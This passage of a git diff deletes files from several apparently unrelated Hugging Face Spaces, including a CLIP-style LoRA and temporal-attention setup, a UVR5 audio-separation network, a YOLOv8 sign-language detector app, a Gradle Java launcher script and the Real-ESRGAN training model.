"temporal_attn.v_proj", - "temporal_attn.q_proj", "temporal_attn.out_proj", - "temporal_mlp.fc1", "temporal_mlp.fc2"] - else: - target_modules = ["k_proj", "v_proj", "q_proj", "out_proj"] - config = LoraConfig( - r=args.lora_r, # 16 - lora_alpha=args.lora_alpha, # 16 - target_modules=target_modules, # self_attn.out_proj - lora_dropout=args.lora_dropout, # 0.1 - bias="none", - modules_to_save=[], - ) - model.vision_model.encoder.is_gradient_checkpointing = False - model.vision_model.encoder = get_peft_model(model.vision_model.encoder, config) - if is_master(args): - print_trainable_parameters(model.vision_model.encoder, msg='The model.vision_model.encoder: ') - # model.text_model.encoder.is_gradient_checkpointing = False - # model.text_model.encoder = get_peft_model(model.text_model.encoder, config) - # if is_master(args): - # print_trainable_parameters(model.text_model.encoder, msg='The model.text_model.encoder: ') - - - -def add_time_attn_block(m: nn.ModuleList, device): - config = m.config - for i, sub_m in enumerate(m.layers): - if isinstance(sub_m, SpatialCLIPEncoderLayer): - oup = CLIPEncoderLayer(config).to(device) - state_dict = sub_m.state_dict() - - new_state_dict = {} - for k, v in state_dict.items(): - if 'self_attn' in k: - new_state_dict[k] = v - # if 'out_proj' in k: - # v = torch.zeros_like(v, dtype=v.dtype, device=v.device) - new_k = 'temporal_attn.' + '.'.join(k.split('.')[1:]) - new_state_dict[new_k] = v - elif 'mlp' in k: - new_state_dict[k] = v - # if 'out_proj' in k: - # v = torch.zeros_like(v, dtype=v.dtype, device=v.device) - new_k = 'temporal_mlp.' + '.'.join(k.split('.')[1:]) - new_state_dict[new_k] = v - elif 'layer_norm1' in k: - new_state_dict[k] = v - new_k = 'temporal_layer_norm1.' + '.'.join(k.split('.')[1:]) - new_state_dict[new_k] = v - elif 'layer_norm2' in k: - new_state_dict[k] = v - new_k = 'temporal_layer_norm2.' 
+ '.'.join(k.split('.')[1:]) - new_state_dict[new_k] = v - else: - new_state_dict[k] = v - - missing_keys, unexpected_keys = oup.load_state_dict(new_state_dict, strict=False) - # assert missing_keys == ["t_attn_gate", "t_ffn_gate"] - assert missing_keys == ['temporal_embedding'] - assert unexpected_keys == [] - m.layers[i] = oup - -def resize_pos(m: nn.Module, args): - # convert embedding - if args.clip_type == 'al': - m.image_size = [args.num_mel_bins, args.target_length] - m.config.image_size = [m.image_size, m.image_size] if isinstance(m.image_size, int) else m.image_size - - # m.config.num_channels = 1 - # new_patch_embedding = nn.Conv2d( - # in_channels=m.config.num_channels, - # out_channels=m.embed_dim, - # kernel_size=m.patch_size, - # stride=m.patch_size, - # bias=False, - # ) - # state_dict = m.patch_embedding.state_dict() - # for k, v in state_dict.items(): - # state_dict[k] = torch.mean(v, dim=1, keepdim=True).to(v.dtype) - # m.patch_embedding = new_patch_embedding - # m.patch_embedding.load_state_dict(state_dict) - - # pos resize - old_pos_embed_state_dict = m.position_embedding.state_dict() - old_pos_embed = old_pos_embed_state_dict['weight'] - dtype = old_pos_embed.dtype - grid_size = [m.config.image_size[0] // m.patch_size, m.config.image_size[1] // m.patch_size] - extra_tokens = 1 # FIXME detect different token configs (ie no class token, or more) - new_seq_len = grid_size[0] * grid_size[1] + extra_tokens - if new_seq_len == old_pos_embed.shape[0]: - m.to(args.device) - return - - m.num_patches = grid_size[0] * grid_size[1] - m.num_positions = m.num_patches + 1 - m.register_buffer("position_ids", torch.arange(m.num_positions).expand((1, -1))) - new_position_embedding = nn.Embedding(m.num_positions, m.embed_dim) - - if extra_tokens: - pos_emb_tok, pos_emb_img = old_pos_embed[:extra_tokens], old_pos_embed[extra_tokens:] - else: - pos_emb_tok, pos_emb_img = None, old_pos_embed - old_grid_size = [int(math.sqrt(len(pos_emb_img)))]*2 - - if is_master(args): - logging.info('Resizing position embedding grid-size from %s to %s', old_grid_size, grid_size) - pos_emb_img = pos_emb_img.reshape(1, old_grid_size[0], old_grid_size[1], -1).permute(0, 3, 1, 2) - pos_emb_img = F.interpolate( - pos_emb_img, - size=grid_size, - mode='bicubic', - antialias=True, - align_corners=False, - ) - pos_emb_img = pos_emb_img.permute(0, 2, 3, 1).reshape(1, grid_size[0] * grid_size[1], -1)[0] - if pos_emb_tok is not None: - new_pos_embed = torch.cat([pos_emb_tok, pos_emb_img], dim=0) - else: - new_pos_embed = pos_emb_img - old_pos_embed_state_dict['weight'] = new_pos_embed.to(dtype) - m.position_embedding = new_position_embedding - m.position_embedding.load_state_dict(old_pos_embed_state_dict) - - m.to(args.device) - - -# def i2v_linear_resize_pos_embed(state_dict, model, interpolation: str = 'linear', antialias: bool = True): -# # Rescale the grid of position embeddings when loading from state_dict -# old_pos_embed = state_dict.get('visual.positional_embedding', None) -# if old_pos_embed is None or not hasattr(model.visual, 'grid_size'): -# return -# # grid_size = to_2tuple(model.visual.grid_size) -# grid_size = model.visual.grid_size -# extra_tokens = 1 # FIXME detect different token configs (ie no class token, or more) -# # new_seq_len = grid_size[0] * grid_size[1] + extra_tokens -# new_seq_len = grid_size[0] * grid_size[1] * grid_size[2] + extra_tokens -# if new_seq_len == old_pos_embed.shape[0]: -# return -# -# if extra_tokens: -# pos_emb_tok, pos_emb_img = old_pos_embed[:extra_tokens], 
old_pos_embed[extra_tokens:] -# else: -# pos_emb_tok, pos_emb_img = None, old_pos_embed -# # old_grid_size = to_2tuple(int(math.sqrt(len(pos_emb_img)))) -# -# logging.info('Resizing position embedding grid-size from %s to %s', old_pos_embed.shape[0], new_seq_len) -# # pos_emb_img = pos_emb_img.reshape(1, old_grid_size[0], old_grid_size[1], -1).permute(0, 3, 1, 2) -# pos_emb_img = pos_emb_img.unsqueeze(0).permute(0, 2, 1) -# pos_emb_img = F.interpolate( -# pos_emb_img, -# # size=grid_size, -# size=new_seq_len - extra_tokens, -# mode=interpolation, -# # antialias=antialias, -# # align_corners=False, -# ) -# # pos_emb_img = pos_emb_img.permute(0, 2, 3, 1).reshape(1, grid_size[0] * grid_size[1], -1)[0] -# pos_emb_img = pos_emb_img.permute(0, 2, 1)[0] -# if pos_emb_tok is not None: -# new_pos_embed = torch.cat([pos_emb_tok, pos_emb_img], dim=0) -# else: -# new_pos_embed = pos_emb_img -# state_dict['visual.positional_embedding'] = new_pos_embed -# -# def inflate_patch_embed(state_dict, model): -# old_patch_embed_shape = model.visual.conv1.weight.shape -# new_patch_embed_shape = state_dict['visual.conv1.weight'].shape -# if old_patch_embed_shape == new_patch_embed_shape: -# return -# expanded_weight = state_dict['visual.conv1.weight'].unsqueeze(2).repeat(1, 1, 2, 1, 1) -# state_dict['visual.conv1.weight'] = expanded_weight -# -# -# def load_checkpoint(model, pretrained, strict=True): -# state_dict = load_state_dict(pretrained) -# # detect old format and make compatible with new format -# if 'positional_embedding' in state_dict and not hasattr(model, 'positional_embedding'): -# state_dict = convert_to_custom_text_state_dict(state_dict) -# i2v_linear_resize_pos_embed(state_dict, model) -# inflate_patch_embed(state_dict, model) -# incompatible_keys = model.load_state_dict(state_dict, strict=strict) -# return incompatible_keys - diff --git a/spaces/LaynzKunz/Aesthetic_RVC_Inference_HF/lib/infer/infer_libs/uvr5_pack/lib_v5/nets_123821KB.py b/spaces/LaynzKunz/Aesthetic_RVC_Inference_HF/lib/infer/infer_libs/uvr5_pack/lib_v5/nets_123821KB.py deleted file mode 100644 index 167d4cb2198863cf43e93440f7e63c5342fc7605..0000000000000000000000000000000000000000 --- a/spaces/LaynzKunz/Aesthetic_RVC_Inference_HF/lib/infer/infer_libs/uvr5_pack/lib_v5/nets_123821KB.py +++ /dev/null @@ -1,122 +0,0 @@ -import torch -import torch.nn.functional as F -from torch import nn - -from . 
import layers_123821KB as layers - - -class BaseASPPNet(nn.Module): - def __init__(self, nin, ch, dilations=(4, 8, 16)): - super(BaseASPPNet, self).__init__() - self.enc1 = layers.Encoder(nin, ch, 3, 2, 1) - self.enc2 = layers.Encoder(ch, ch * 2, 3, 2, 1) - self.enc3 = layers.Encoder(ch * 2, ch * 4, 3, 2, 1) - self.enc4 = layers.Encoder(ch * 4, ch * 8, 3, 2, 1) - - self.aspp = layers.ASPPModule(ch * 8, ch * 16, dilations) - - self.dec4 = layers.Decoder(ch * (8 + 16), ch * 8, 3, 1, 1) - self.dec3 = layers.Decoder(ch * (4 + 8), ch * 4, 3, 1, 1) - self.dec2 = layers.Decoder(ch * (2 + 4), ch * 2, 3, 1, 1) - self.dec1 = layers.Decoder(ch * (1 + 2), ch, 3, 1, 1) - - def __call__(self, x): - h, e1 = self.enc1(x) - h, e2 = self.enc2(h) - h, e3 = self.enc3(h) - h, e4 = self.enc4(h) - - h = self.aspp(h) - - h = self.dec4(h, e4) - h = self.dec3(h, e3) - h = self.dec2(h, e2) - h = self.dec1(h, e1) - - return h - - -class CascadedASPPNet(nn.Module): - def __init__(self, n_fft): - super(CascadedASPPNet, self).__init__() - self.stg1_low_band_net = BaseASPPNet(2, 32) - self.stg1_high_band_net = BaseASPPNet(2, 32) - - self.stg2_bridge = layers.Conv2DBNActiv(34, 16, 1, 1, 0) - self.stg2_full_band_net = BaseASPPNet(16, 32) - - self.stg3_bridge = layers.Conv2DBNActiv(66, 32, 1, 1, 0) - self.stg3_full_band_net = BaseASPPNet(32, 64) - - self.out = nn.Conv2d(64, 2, 1, bias=False) - self.aux1_out = nn.Conv2d(32, 2, 1, bias=False) - self.aux2_out = nn.Conv2d(32, 2, 1, bias=False) - - self.max_bin = n_fft // 2 - self.output_bin = n_fft // 2 + 1 - - self.offset = 128 - - def forward(self, x, aggressiveness=None): - mix = x.detach() - x = x.clone() - - x = x[:, :, : self.max_bin] - - bandw = x.size()[2] // 2 - aux1 = torch.cat( - [ - self.stg1_low_band_net(x[:, :, :bandw]), - self.stg1_high_band_net(x[:, :, bandw:]), - ], - dim=2, - ) - - h = torch.cat([x, aux1], dim=1) - aux2 = self.stg2_full_band_net(self.stg2_bridge(h)) - - h = torch.cat([x, aux1, aux2], dim=1) - h = self.stg3_full_band_net(self.stg3_bridge(h)) - - mask = torch.sigmoid(self.out(h)) - mask = F.pad( - input=mask, - pad=(0, 0, 0, self.output_bin - mask.size()[2]), - mode="replicate", - ) - - if self.training: - aux1 = torch.sigmoid(self.aux1_out(aux1)) - aux1 = F.pad( - input=aux1, - pad=(0, 0, 0, self.output_bin - aux1.size()[2]), - mode="replicate", - ) - aux2 = torch.sigmoid(self.aux2_out(aux2)) - aux2 = F.pad( - input=aux2, - pad=(0, 0, 0, self.output_bin - aux2.size()[2]), - mode="replicate", - ) - return mask * mix, aux1 * mix, aux2 * mix - else: - if aggressiveness: - mask[:, :, : aggressiveness["split_bin"]] = torch.pow( - mask[:, :, : aggressiveness["split_bin"]], - 1 + aggressiveness["value"] / 3, - ) - mask[:, :, aggressiveness["split_bin"] :] = torch.pow( - mask[:, :, aggressiveness["split_bin"] :], - 1 + aggressiveness["value"], - ) - - return mask * mix - - def predict(self, x_mag, aggressiveness=None): - h = self.forward(x_mag, aggressiveness) - - if self.offset > 0: - h = h[:, :, :, self.offset : -self.offset] - assert h.size()[3] > 0 - - return h diff --git a/spaces/LeoDog896/yolov8n-asl/app.py b/spaces/LeoDog896/yolov8n-asl/app.py deleted file mode 100644 index 605652d9fe091bea928683d874705467ec2894c1..0000000000000000000000000000000000000000 --- a/spaces/LeoDog896/yolov8n-asl/app.py +++ /dev/null @@ -1,100 +0,0 @@ -import gradio as gr -import cv2 - -from ultralytics import YOLO - -model = YOLO('best.pt') - -def show_preds_image(image_path): - image = cv2.imread(image_path) - outputs = model.predict(source=image_path) - results = 
outputs[0].cpu().numpy() - for i, det in enumerate(results.boxes.xyxy): - id = results.boxes.cls[i] - name = model.names[id] - - #draw box around name - cv2.rectangle( - image, - (int(det[0]), int(det[1])), - (int(det[0]) + len(name) * 20, int(det[1]) - 30), - color=(0, 0, 255), - thickness=-1, - lineType=cv2.LINE_AA - ) - - # draw name - cv2.putText( - image, - str(name), - (int(det[0]), int(det[1]) - 5), - cv2.FONT_HERSHEY_SIMPLEX, - 1, - (255, 255, 255), - 2, - cv2.LINE_AA - ) - - # draw box - cv2.rectangle( - image, - (int(det[0]), int(det[1])), - (int(det[2]), int(det[3])), - color=(0, 0, 255), - thickness=2, - lineType=cv2.LINE_AA - ) - return cv2.cvtColor(image, cv2.COLOR_BGR2RGB) - -inputs_image = [ - gr.components.Image(type="filepath", label="Input Image"), -] -outputs_image = [ - gr.components.Image(type="numpy", label="Output Image"), -] -interface_image = gr.Interface( - fn=show_preds_image, - inputs=inputs_image, - outputs=outputs_image, - title="ASL detector", - cache_examples=False, -) - -def show_preds_video(video_path): - cap = cv2.VideoCapture(video_path) - while(cap.isOpened()): - ret, frame = cap.read() - if ret: - frame_copy = frame.copy() - outputs = model.predict(source=frame) - results = outputs[0].cpu().numpy() - for i, det in enumerate(results.boxes.xyxy): - cv2.rectangle( - frame_copy, - (int(det[0]), int(det[1])), - (int(det[2]), int(det[3])), - color=(0, 0, 255), - thickness=2, - lineType=cv2.LINE_AA - ) - yield cv2.cvtColor(frame_copy, cv2.COLOR_BGR2RGB) - -inputs_video = [ - gr.components.Video(type="filepath", label="Input Video"), - -] -outputs_video = [ - gr.components.Image(type="numpy", label="Output Image"), -] -interface_video = gr.Interface( - fn=show_preds_video, - inputs=inputs_video, - outputs=outputs_video, - title="ASL detector", - cache_examples=False, -) - -gr.TabbedInterface( - [interface_image, interface_video], - tab_names=['Image inference', 'Video inference'] -).queue().launch() \ No newline at end of file diff --git a/spaces/Lianguangluowuyan/QQsign/bin/unidbg-fetch-qsign.bat b/spaces/Lianguangluowuyan/QQsign/bin/unidbg-fetch-qsign.bat deleted file mode 100644 index 8b291e7303b0c07d14b714e5795473891363c85b..0000000000000000000000000000000000000000 --- a/spaces/Lianguangluowuyan/QQsign/bin/unidbg-fetch-qsign.bat +++ /dev/null @@ -1,89 +0,0 @@ -@rem -@rem Copyright 2015 the original author or authors. -@rem -@rem Licensed under the Apache License, Version 2.0 (the "License"); -@rem you may not use this file except in compliance with the License. -@rem You may obtain a copy of the License at -@rem -@rem https://www.apache.org/licenses/LICENSE-2.0 -@rem -@rem Unless required by applicable law or agreed to in writing, software -@rem distributed under the License is distributed on an "AS IS" BASIS, -@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -@rem See the License for the specific language governing permissions and -@rem limitations under the License. -@rem - -@if "%DEBUG%" == "" @echo off -@rem ########################################################################## -@rem -@rem unidbg-fetch-qsign startup script for Windows -@rem -@rem ########################################################################## - -@rem Set local scope for the variables with windows NT shell -if "%OS%"=="Windows_NT" setlocal - -set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. -set APP_BASE_NAME=%~n0 -set APP_HOME=%DIRNAME%.. - -@rem Resolve any "." and ".." in APP_HOME to make it shorter. 
-for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi - -@rem Add default JVM options here. You can also use JAVA_OPTS and UNIDBG_FETCH_QSIGN_OPTS to pass JVM options to this script. -set DEFAULT_JVM_OPTS= - -@rem Find java.exe -if defined JAVA_HOME goto findJavaFromJavaHome - -set JAVA_EXE=java.exe -%JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto execute - -echo. -echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. -echo. -echo Please set the JAVA_HOME variable in your environment to match the -echo location of your Java installation. - -goto fail - -:findJavaFromJavaHome -set JAVA_HOME=%JAVA_HOME:"=% -set JAVA_EXE=%JAVA_HOME%/bin/java.exe - -if exist "%JAVA_EXE%" goto execute - -echo. -echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% -echo. -echo Please set the JAVA_HOME variable in your environment to match the -echo location of your Java installation. - -goto fail - -:execute -@rem Setup the command line - -set CLASSPATH=%APP_HOME%\lib\unidbg-fetch-qsign-1.1.9.jar;%APP_HOME%\lib\unidbg-android-105.jar;%APP_HOME%\lib\ktor-server-content-negotiation-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-serialization-kotlinx-json-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-server-status-pages-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-server-netty-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-server-host-common-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-server-core-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-serialization-kotlinx-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-serialization-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-events-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-websockets-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-http-cio-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-http-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-network-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-utils-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-io-jvm-2.3.1.jar;%APP_HOME%\lib\kotlin-stdlib-jdk8-1.8.22.jar;%APP_HOME%\lib\kotlinx-serialization-json-jvm-1.5.1.jar;%APP_HOME%\lib\kotlinx-serialization-protobuf-jvm-1.5.1.jar;%APP_HOME%\lib\kotlinx-serialization-core-jvm-1.5.1.jar;%APP_HOME%\lib\logback-classic-1.2.11.jar;%APP_HOME%\lib\kotlinx-coroutines-jdk8-1.7.1.jar;%APP_HOME%\lib\kotlinx-coroutines-core-jvm-1.7.1.jar;%APP_HOME%\lib\kotlin-stdlib-jdk7-1.8.22.jar;%APP_HOME%\lib\kotlin-reflect-1.8.10.jar;%APP_HOME%\lib\kotlin-stdlib-1.8.22.jar;%APP_HOME%\lib\slf4j-api-1.7.36.jar;%APP_HOME%\lib\kotlin-stdlib-common-1.8.22.jar;%APP_HOME%\lib\config-1.4.2.jar;%APP_HOME%\lib\jansi-2.4.0.jar;%APP_HOME%\lib\netty-codec-http2-4.1.92.Final.jar;%APP_HOME%\lib\alpn-api-1.1.3.v20160715.jar;%APP_HOME%\lib\netty-transport-native-kqueue-4.1.92.Final.jar;%APP_HOME%\lib\netty-transport-native-epoll-4.1.92.Final.jar;%APP_HOME%\lib\logback-core-1.2.11.jar;%APP_HOME%\lib\annotations-23.0.0.jar;%APP_HOME%\lib\netty-codec-http-4.1.92.Final.jar;%APP_HOME%\lib\netty-handler-4.1.92.Final.jar;%APP_HOME%\lib\netty-codec-4.1.92.Final.jar;%APP_HOME%\lib\netty-transport-classes-kqueue-4.1.92.Final.jar;%APP_HOME%\lib\netty-transport-classes-epoll-4.1.92.Final.jar;%APP_HOME%\lib\netty-transport-native-unix-common-4.1.92.Final.jar;%APP_HOME%\lib\netty-transport-4.1.92.Final.jar;%APP_HOME%\lib\netty-buffer-4.1.92.Final.jar;%APP_HOME%\lib\netty-resolver-4.1.92.Final.jar;%APP_HOME%\lib\netty-common-4.1.92.Final.jar - - -@rem Execute unidbg-fetch-qsign -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %UNIDBG_FETCH_QSIGN_OPTS% -classpath "%CLASSPATH%" MainKt %* - -:end -@rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd - -:fail -rem Set variable UNIDBG_FETCH_QSIGN_EXIT_CONSOLE if you need 
the _script_ return code instead of -rem the _cmd.exe /c_ return code! -if not "" == "%UNIDBG_FETCH_QSIGN_EXIT_CONSOLE%" exit 1 -exit /b 1 - -:mainEnd -if "%OS%"=="Windows_NT" endlocal - -:omega diff --git a/spaces/LittleYuan/My-Real-Bot/realesrgan/models/realesrgan_model.py b/spaces/LittleYuan/My-Real-Bot/realesrgan/models/realesrgan_model.py deleted file mode 100644 index c298a09c42433177f90001a0a31d029576072ccd..0000000000000000000000000000000000000000 --- a/spaces/LittleYuan/My-Real-Bot/realesrgan/models/realesrgan_model.py +++ /dev/null @@ -1,258 +0,0 @@ -import numpy as np -import random -import torch -from basicsr.data.degradations import random_add_gaussian_noise_pt, random_add_poisson_noise_pt -from basicsr.data.transforms import paired_random_crop -from basicsr.models.srgan_model import SRGANModel -from basicsr.utils import DiffJPEG, USMSharp -from basicsr.utils.img_process_util import filter2D -from basicsr.utils.registry import MODEL_REGISTRY -from collections import OrderedDict -from torch.nn import functional as F - - -@MODEL_REGISTRY.register() -class RealESRGANModel(SRGANModel): - """RealESRGAN Model for Real-ESRGAN: Training Real-World Blind Super-Resolution with Pure Synthetic Data. - - It mainly performs: - 1. randomly synthesize LQ images in GPU tensors - 2. optimize the networks with GAN training. - """ - - def __init__(self, opt): - super(RealESRGANModel, self).__init__(opt) - self.jpeger = DiffJPEG(differentiable=False).cuda() # simulate JPEG compression artifacts - self.usm_sharpener = USMSharp().cuda() # do usm sharpening - self.queue_size = opt.get('queue_size', 180) - - @torch.no_grad() - def _dequeue_and_enqueue(self): - """It is the training pair pool for increasing the diversity in a batch. - - Batch processing limits the diversity of synthetic degradations in a batch. For example, samples in a - batch could not have different resize scaling factors. Therefore, we employ this training pair pool - to increase the degradation diversity in a batch. - """ - # initialize - b, c, h, w = self.lq.size() - if not hasattr(self, 'queue_lr'): - assert self.queue_size % b == 0, f'queue size {self.queue_size} should be divisible by batch size {b}' - self.queue_lr = torch.zeros(self.queue_size, c, h, w).cuda() - _, c, h, w = self.gt.size() - self.queue_gt = torch.zeros(self.queue_size, c, h, w).cuda() - self.queue_ptr = 0 - if self.queue_ptr == self.queue_size: # the pool is full - # do dequeue and enqueue - # shuffle - idx = torch.randperm(self.queue_size) - self.queue_lr = self.queue_lr[idx] - self.queue_gt = self.queue_gt[idx] - # get first b samples - lq_dequeue = self.queue_lr[0:b, :, :, :].clone() - gt_dequeue = self.queue_gt[0:b, :, :, :].clone() - # update the queue - self.queue_lr[0:b, :, :, :] = self.lq.clone() - self.queue_gt[0:b, :, :, :] = self.gt.clone() - - self.lq = lq_dequeue - self.gt = gt_dequeue - else: - # only do enqueue - self.queue_lr[self.queue_ptr:self.queue_ptr + b, :, :, :] = self.lq.clone() - self.queue_gt[self.queue_ptr:self.queue_ptr + b, :, :, :] = self.gt.clone() - self.queue_ptr = self.queue_ptr + b - - @torch.no_grad() - def feed_data(self, data): - """Accept data from dataloader, and then add two-order degradations to obtain LQ images. 
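-
-        ("Two-order" refers to the two successive degradation stages applied below (blur, random resize,
-        Gaussian/Poisson noise, JPEG compression), followed by a final sinc filter, a random crop and the
-        training-pair pool.)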
- """ - if self.is_train and self.opt.get('high_order_degradation', True): - # training data synthesis - self.gt = data['gt'].to(self.device) - self.gt_usm = self.usm_sharpener(self.gt) - - self.kernel1 = data['kernel1'].to(self.device) - self.kernel2 = data['kernel2'].to(self.device) - self.sinc_kernel = data['sinc_kernel'].to(self.device) - - ori_h, ori_w = self.gt.size()[2:4] - - # ----------------------- The first degradation process ----------------------- # - # blur - out = filter2D(self.gt_usm, self.kernel1) - # random resize - updown_type = random.choices(['up', 'down', 'keep'], self.opt['resize_prob'])[0] - if updown_type == 'up': - scale = np.random.uniform(1, self.opt['resize_range'][1]) - elif updown_type == 'down': - scale = np.random.uniform(self.opt['resize_range'][0], 1) - else: - scale = 1 - mode = random.choice(['area', 'bilinear', 'bicubic']) - out = F.interpolate(out, scale_factor=scale, mode=mode) - # add noise - gray_noise_prob = self.opt['gray_noise_prob'] - if np.random.uniform() < self.opt['gaussian_noise_prob']: - out = random_add_gaussian_noise_pt( - out, sigma_range=self.opt['noise_range'], clip=True, rounds=False, gray_prob=gray_noise_prob) - else: - out = random_add_poisson_noise_pt( - out, - scale_range=self.opt['poisson_scale_range'], - gray_prob=gray_noise_prob, - clip=True, - rounds=False) - # JPEG compression - jpeg_p = out.new_zeros(out.size(0)).uniform_(*self.opt['jpeg_range']) - out = torch.clamp(out, 0, 1) # clamp to [0, 1], otherwise JPEGer will result in unpleasant artifacts - out = self.jpeger(out, quality=jpeg_p) - - # ----------------------- The second degradation process ----------------------- # - # blur - if np.random.uniform() < self.opt['second_blur_prob']: - out = filter2D(out, self.kernel2) - # random resize - updown_type = random.choices(['up', 'down', 'keep'], self.opt['resize_prob2'])[0] - if updown_type == 'up': - scale = np.random.uniform(1, self.opt['resize_range2'][1]) - elif updown_type == 'down': - scale = np.random.uniform(self.opt['resize_range2'][0], 1) - else: - scale = 1 - mode = random.choice(['area', 'bilinear', 'bicubic']) - out = F.interpolate( - out, size=(int(ori_h / self.opt['scale'] * scale), int(ori_w / self.opt['scale'] * scale)), mode=mode) - # add noise - gray_noise_prob = self.opt['gray_noise_prob2'] - if np.random.uniform() < self.opt['gaussian_noise_prob2']: - out = random_add_gaussian_noise_pt( - out, sigma_range=self.opt['noise_range2'], clip=True, rounds=False, gray_prob=gray_noise_prob) - else: - out = random_add_poisson_noise_pt( - out, - scale_range=self.opt['poisson_scale_range2'], - gray_prob=gray_noise_prob, - clip=True, - rounds=False) - - # JPEG compression + the final sinc filter - # We also need to resize images to desired sizes. We group [resize back + sinc filter] together - # as one operation. - # We consider two orders: - # 1. [resize back + sinc filter] + JPEG compression - # 2. JPEG compression + [resize back + sinc filter] - # Empirically, we find other combinations (sinc + JPEG + Resize) will introduce twisted lines. 
- if np.random.uniform() < 0.5: - # resize back + the final sinc filter - mode = random.choice(['area', 'bilinear', 'bicubic']) - out = F.interpolate(out, size=(ori_h // self.opt['scale'], ori_w // self.opt['scale']), mode=mode) - out = filter2D(out, self.sinc_kernel) - # JPEG compression - jpeg_p = out.new_zeros(out.size(0)).uniform_(*self.opt['jpeg_range2']) - out = torch.clamp(out, 0, 1) - out = self.jpeger(out, quality=jpeg_p) - else: - # JPEG compression - jpeg_p = out.new_zeros(out.size(0)).uniform_(*self.opt['jpeg_range2']) - out = torch.clamp(out, 0, 1) - out = self.jpeger(out, quality=jpeg_p) - # resize back + the final sinc filter - mode = random.choice(['area', 'bilinear', 'bicubic']) - out = F.interpolate(out, size=(ori_h // self.opt['scale'], ori_w // self.opt['scale']), mode=mode) - out = filter2D(out, self.sinc_kernel) - - # clamp and round - self.lq = torch.clamp((out * 255.0).round(), 0, 255) / 255. - - # random crop - gt_size = self.opt['gt_size'] - (self.gt, self.gt_usm), self.lq = paired_random_crop([self.gt, self.gt_usm], self.lq, gt_size, - self.opt['scale']) - - # training pair pool - self._dequeue_and_enqueue() - # sharpen self.gt again, as we have changed the self.gt with self._dequeue_and_enqueue - self.gt_usm = self.usm_sharpener(self.gt) - self.lq = self.lq.contiguous() # for the warning: grad and param do not obey the gradient layout contract - else: - # for paired training or validation - self.lq = data['lq'].to(self.device) - if 'gt' in data: - self.gt = data['gt'].to(self.device) - self.gt_usm = self.usm_sharpener(self.gt) - - def nondist_validation(self, dataloader, current_iter, tb_logger, save_img): - # do not use the synthetic process during validation - self.is_train = False - super(RealESRGANModel, self).nondist_validation(dataloader, current_iter, tb_logger, save_img) - self.is_train = True - - def optimize_parameters(self, current_iter): - # usm sharpening - l1_gt = self.gt_usm - percep_gt = self.gt_usm - gan_gt = self.gt_usm - if self.opt['l1_gt_usm'] is False: - l1_gt = self.gt - if self.opt['percep_gt_usm'] is False: - percep_gt = self.gt - if self.opt['gan_gt_usm'] is False: - gan_gt = self.gt - - # optimize net_g - for p in self.net_d.parameters(): - p.requires_grad = False - - self.optimizer_g.zero_grad() - self.output = self.net_g(self.lq) - - l_g_total = 0 - loss_dict = OrderedDict() - if (current_iter % self.net_d_iters == 0 and current_iter > self.net_d_init_iters): - # pixel loss - if self.cri_pix: - l_g_pix = self.cri_pix(self.output, l1_gt) - l_g_total += l_g_pix - loss_dict['l_g_pix'] = l_g_pix - # perceptual loss - if self.cri_perceptual: - l_g_percep, l_g_style = self.cri_perceptual(self.output, percep_gt) - if l_g_percep is not None: - l_g_total += l_g_percep - loss_dict['l_g_percep'] = l_g_percep - if l_g_style is not None: - l_g_total += l_g_style - loss_dict['l_g_style'] = l_g_style - # gan loss - fake_g_pred = self.net_d(self.output) - l_g_gan = self.cri_gan(fake_g_pred, True, is_disc=False) - l_g_total += l_g_gan - loss_dict['l_g_gan'] = l_g_gan - - l_g_total.backward() - self.optimizer_g.step() - - # optimize net_d - for p in self.net_d.parameters(): - p.requires_grad = True - - self.optimizer_d.zero_grad() - # real - real_d_pred = self.net_d(gan_gt) - l_d_real = self.cri_gan(real_d_pred, True, is_disc=True) - loss_dict['l_d_real'] = l_d_real - loss_dict['out_d_real'] = torch.mean(real_d_pred.detach()) - l_d_real.backward() - # fake - fake_d_pred = self.net_d(self.output.detach().clone()) # clone for pt1.9 - l_d_fake = 
self.cri_gan(fake_d_pred, False, is_disc=True) - loss_dict['l_d_fake'] = l_d_fake - loss_dict['out_d_fake'] = torch.mean(fake_d_pred.detach()) - l_d_fake.backward() - self.optimizer_d.step() - - if self.ema_decay > 0: - self.model_ema(decay=self.ema_decay) - - self.log_dict = self.reduce_loss_dict(loss_dict) diff --git a/spaces/Luccadraw24/Amelia/README.md b/spaces/Luccadraw24/Amelia/README.md deleted file mode 100644 index e477242cc9fbfdc03697bdf4e65c8d6620b1bbb5..0000000000000000000000000000000000000000 --- a/spaces/Luccadraw24/Amelia/README.md +++ /dev/null @@ -1,10 +0,0 @@ ---- -title: Amelia -emoji: 📚 -colorFrom: green -colorTo: green -sdk: docker -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Luelll/ChuanhuChatGPT/README.md b/spaces/Luelll/ChuanhuChatGPT/README.md deleted file mode 100644 index fb163c90d56e9cf816c2d11dbd43871e776a9fc3..0000000000000000000000000000000000000000 --- a/spaces/Luelll/ChuanhuChatGPT/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: ChuanhuChatGPT -emoji: 🐯 -colorFrom: green -colorTo: red -sdk: gradio -sdk_version: 3.28.0 -app_file: ChuanhuChatbot.py -pinned: false -license: gpl-3.0 -duplicated_from: JohnSmith9982/ChuanhuChatGPT ---- - -Check out the 